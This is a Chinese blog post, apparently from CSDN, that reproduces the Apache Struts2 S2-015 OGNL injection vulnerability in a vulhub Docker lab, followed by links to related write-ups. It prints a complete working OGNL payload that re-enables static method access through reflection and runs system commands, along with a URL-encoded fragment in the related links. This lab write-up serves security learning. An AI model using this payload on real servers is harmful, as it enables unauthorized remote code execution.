Struts2 S2-015复现

最新推荐文章于 2024-06-23 08:00:00 发布
最新推荐文章于 2024-06-23 08:00:00 发布
阅读量318 收藏 1
点赞数
分类专栏: 渗透测试 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZJT6666666/article/details/128419484
版权

1.漏洞描述

漏洞产生于配置了 Action 通配符 *,并将其作为动态值时,解析时会将其内容执行 OGNL 表达式,例如:

<package name="S2-015" extends="struts-default">
    <action name="*" class="com.demo.action.PageAction">
        <result>/{1}.jsp</result>
    </action>
</package>

 上述配置能让我们访问 name.action 时使用 name.jsp 来渲染页面,但是在提取 name 并解析时,对其执行了 OGNL 表达式解析,所以导致命令执行。在实践复现的时候发现,由于 name 值的位置比较特殊,一些特殊的字符如 / " \ 都无法使用(转义也不行),所以在利用该点进行远程命令执行时一些带有路径的命令可能无法执行成功。还有需要说明的就是在 Struts 2.3.14.1 - Struts 2.3.14.2 的更新内容中,删除了 SecurityMemberAccess 类中的 setAllowStaticMethodAccess 方法,因此在 2.3.14.2 版本以后都不能直接通过 #_memberAccess['allowStaticMethodAccess']=true 来修改其值达到重获静态方法调用的能力。

这里为了到达执行命令的目的可以用 kxlzx 提到的调用动态方法 (new java.lang.ProcessBuilder('calc')).start() 来解决,另外还可以借助 Java 反射机制去间接修改:

#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true)

影响版本:struts 2.0.0 - 2.3.14.2

2.漏洞搭建

采用docker方式搭建,使用vulhub。

通过cd命令进入达到vulhub的靶场文件的位置。

通过以下命令启动环境

docker-compose build
docker-compose up -d

 通过ps查看端口号

访问搭建的环境(这种就代表环境搭建成功)

3.复现

poc

${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream()),#q}

注意url编码且payload后要添加.action

复现成功。

你能拿我咋的
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
在线靶场-墨者-命令执行2星-Apache Struts2远程代码执行漏洞(S2-015)复现
weixin_42079912的博客
08-09 1153
s2-015漏洞的原理:Struts 2允许基于通配符定义动作映射,如果一个请求与任何其他定义的操作不匹配,它将被匹配,*并且所请求的操作名称将用于以操作名称加载JSP文件。并且,1作为OGNL表达式的威胁值,{ }可以在服务器端执行任意的Java代码。 打开靶场网页,等网页加载完。如果没有加载完(靶场环境可能没有完全部署好),可能会影响工具检测结果。 方法一:Struts2漏洞检查工具2017...
0x22. Apache Struts2远程代码执行漏洞(S2-015)复现
qq_31679787的博客
10-17 337
s2-015:1.漏洞产生于配置了 Action 通配符 *,并将其作为动态值时,解析时会将其内容执行 OGNL 表达式;2.通过result二次引用执行; 通过poc测试是否存在s2-015漏洞; poc:%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_membe...
Struts2 S2-015 远程代码执行漏洞(CVE-2013-2135)
最新发布
qq_68163788的博客
06-23 317
Apache Struts 2是一个用于构建企业级Java Web应用程序的开源Web应用程序框架。它采用MVC(Model-View-Controller)模式,允许开发人员将业务逻辑、数据传输和用户界面分开,从而实现更好地组织和维护代码。Struts 2具有强大的功能,包括拦截器支持、表单验证、国际化、标签库、表单标记等,使开发人员能够快速构建功能丰富的Web应用程序。
『Java安全』Struts 2.3.14.2 action占位符OGNL注入漏洞S2-015复现与浅析
Ho1aAs‘s Blog
08-29 967
action的name可以设置为*,当URL没有匹配到任何action的时候,就会匹配*对应的action;而一般开发中获取*对应的字符串,然后result返回以该字符串命名的jsp,获取该字符串用的是占位符{x},依照星号从左往右从1开始匹配例如:......
08#墨者靶场-Apache Struts2远程代码执行漏洞(S2-015)复现
shy的博客
11-25 1187
墨者学习 By/shy014 背景介绍 某日,安全工程师"墨者"对一单位业务系统进行授权扫描,在扫描过程中,发现了某个业务系统使用Apache Struts2框架。并且该版本存在高危漏洞,...
墨者学院_Apache Struts2远程代码执行漏洞(S2-015)复现
cc_de_csdn的博客
08-26 723
1.由题意得知靶场存在S2-15漏洞 2.使用struts2漏洞扫描工具对网站进行扫描发现存在漏洞 3.使用工具的远程代码执行功能,通过ls发现存在key文件,通过cat访问key文件得到key ...
struts2 最新漏洞 S2-016、S2-017修补方案 .docx
08-01
Struts2 最新漏洞 S2-016、S2-017 修补方案 Struts2 是一个基于 Java 的 Web 应用程序框架,由 Apache 软件基金会维护。最近,Struts2 发生了两个严重的漏洞,分别是 S2-016 和 S2-017,这两个漏洞可能会导致攻击者...
Struts2-S2-029漏洞分析1
08-08
Struts2-S2-029漏洞是一个严重的问题,它涉及到OGNL(Object-Graph Navigation Language)表达式在Struts2框架中的不安全处理。此漏洞的根本原因是开发人员在处理OGNL表达式中的赋值操作时,错误地编写了判断条件,...
struts-2.5.16-源码+示例(S2-057漏洞演示环境)
08-24
S2-057漏洞,全称为"Struts2 OGNL注入漏洞",主要源于Struts 2框架处理用户输入时的不当验证和处理。OGNL (Object-Graph Navigation Language) 是一种强大的表达式语言,用于获取和设置Java对象的属性。在Struts 2中...
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
S2-045 漏洞,官方称为“基于Struts2的Content-Type注入”,是在2017年被发现的。这个漏洞存在于Struts2的Jakarta插件中,该插件处理HTTP请求头中的Content-Type字段时存在缺陷。攻击者可以通过精心构造的HTTP请求,...
Struts2struts2自带插件实现异步调用案例struts015
12-07
参考博文:http://blog.csdn.net/u011638419/article/details/41785683
墨者学院-Apache Struts2远程代码执行漏洞(S2-015)复现
JimWu的博客
09-04 2003
Apache Struts2远程代码执行漏洞(S2-015)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理: 如果一个请求与任何其他定义的操作不匹配,它将被匹配,*并且所请求的操作名称将用于以操作名称加载JSP文件。并且,1作为OGNL表达式的威胁值,{ }可以在服务器端执行任意的Java代码。 1.打开靶场,测试是否存在漏洞。 输入/${1+1}.action...
CTF-Apache Struts2远程代码执行漏洞(S2-015)复现
asd158923328的博客
08-21 762
根据题意 针对 Action 名称进行默认字符限制 [a-z][A-Z][0-9][.-_!/] 漏洞产生于配置了 Action 通配符 *,并将其作为动态值时,解析时会将其内容执行 OGNL 表达式,例如:/{1}.jsp 上述配置能让我们访问 name.action 时使用 name.jsp来渲染页面,但是在提取 name 并解析时,对其执行了 OGNL 表达式解析,所以导致命令执行。在实践...
Struts2-062复现
kriesa的博客
07-13 248
Struts2-062复现
[ vulhub漏洞复现篇 ] Struts2远程代码执行(S2-015)(CVE-2013-2135)
qq_51577576的博客
11-19 721
[ vulhub漏洞复现篇 ] Struts2远程代码执行(S2-015)(CVE-2013-2135) Apache Struts 2是用于开发JavaEE Web应用程序的开源Web应用框架。Apache Struts 2.0.0至2.3.14.2版本中存在远程命令执行漏洞。远程攻击者可借助带有‘${}’和‘%{}’序列值(可导致判断OGNL代码两次)的请求,利用该漏洞执行任意OGNL代码。
vulhub复现之struts漏洞复现
m0_70483044的博客
10-06 452
Struts2就是一个框架,它是属于web层的一个框架,是Struts1的一个升级版,但是它和Struts1来相比,提供了太多的增强和改进,怎么运行的呢,就是实现了Servlet的功能,来进行控制页面跳转。同时这也是基于MVC设计模式的Web应用框架,Struts2的控制功能就相当于MVC中的Controller的功能,用来控制页面的转向。​。
struts2系列漏洞复现
小石头的博客
12-11 834
安装java环境,搭建Tomcat,版本apache-tomcat-9.0.0.M26 启动Tomcat: 解决不能远程访问问题(访问403) \Tomcat 9.0\conf\tomcat-user.xml 补充 <role rolename="manager"/>  <role rolename="manager-gui"/>  <role rolename="admin"/>  <role rol..
buuctf [struts2]s2-015
qq_1873822的博客
03-22 308
漏洞描述 基于通配符定义的动作映射,如果一个请求跟任何其他定义的操作不匹配,他将会匹配*,并且请求的同操作名称的jsp文件 https://blog.csdn.net/qq_45625605/article/details/103138548 将: http://node3.buuoj.cn:27791/welcome.action 改成: http://node3.buuoj.cn:27791/%25%7B1%2B1%7D.action POC %24%7B%23context%5B%27xwork.
Struts2 S2-016上传webshell的需求分析
05-25
Struts2 S2-016漏洞是一种文件上传漏洞,攻击者可以通过该漏洞上传恶意代码(如WebShell)到目标服务器,并在服务器上执行该代码,造成严重的安全威胁。 为了成功利用该漏洞,攻击者需要满足以下条件: 1. 目标...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值